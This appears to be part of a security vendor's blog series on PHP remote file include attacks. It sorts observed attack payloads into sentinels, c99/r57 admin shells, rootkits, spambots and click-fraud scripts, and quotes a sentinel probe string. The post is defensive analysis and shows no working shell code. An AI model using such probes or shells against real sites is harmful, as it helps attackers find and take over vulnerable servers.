In the first part of this series, we talked about what a PHP file include attack is and what it looks like on the wire. This week we'll dive into how attackers are using these vulnerabilities, as well as take a look as some of the payloads they are using.

To start, lets look at the different kinds of payloads people are using in the wild:

Types of payloads:

1. Sentinels: These payloads contain a simple unique string (or a small php function to generate a unique string.) These are used by attackers to help identify whether and which targets are vulnerable during a large scan. A couple examples are: 
• <? echo "bekmekquient" ?>
• 2464053717f0da0c0b00671ab9a8783e
2. Remote administration tools: These are your c99/r57 shells. They provide the attacker with a tool for administrating the target server as well as launching attacks on other servers. We have seen many instances of attackers using these tools to facilitate spam and phishing campaigns.
• c99shell/r57shell - fully featured remote admin tools
• webadmin.php - a simple Web-based file manager
3. Rootkits: While conceptually similar to remote admin tools, what we are calling PHP rootkits are more focused on taking full and lasting control of the underlying system. Typically these scripts come with a local kernel exploit, or automated install of trojaned software. So far, we have not seen any substantial link to phishing or spam campaigns with these payloads like we see with remote admin tools.
• Automated install of a trojaned mysql server
• local kernel exploits to gain root access to system
4. Spambots: The trusty spambot. PHP spambots range in sophistication from simple spam relays to automated scripts which harvest E-mail addresses from local databases and files. All of them serve to annoy you. 
• PHP-Mailer is often used
5. Autosurf scripts: These are scripts which are designed to click through ads and websites in order to artificially increase advertising revenue. Otherwise known as click fraud scripts, these tend to not cause any harm to the system.
   

 
For several months, TippingPoint has been harvesting the payloads used by attackers during real, live attacks. From this, we harvested and categorized thousands of payloads and below is a graph of the distinct payloads we have seen to date. As you can see, by far the most popular choice are the remote admin tools. This is likely because they offer the most flexibility for taking control of the target system.

In the process of analyzing these backdoors we also noticed that these attacks often precede a phishing or spam campaign. Gone are the days when attackers deface a site to gain notoriety. These days, the focus is squarely on making money.

That’s it for this week. Come back next week where we discuss some of the strategies for preventing these attacks.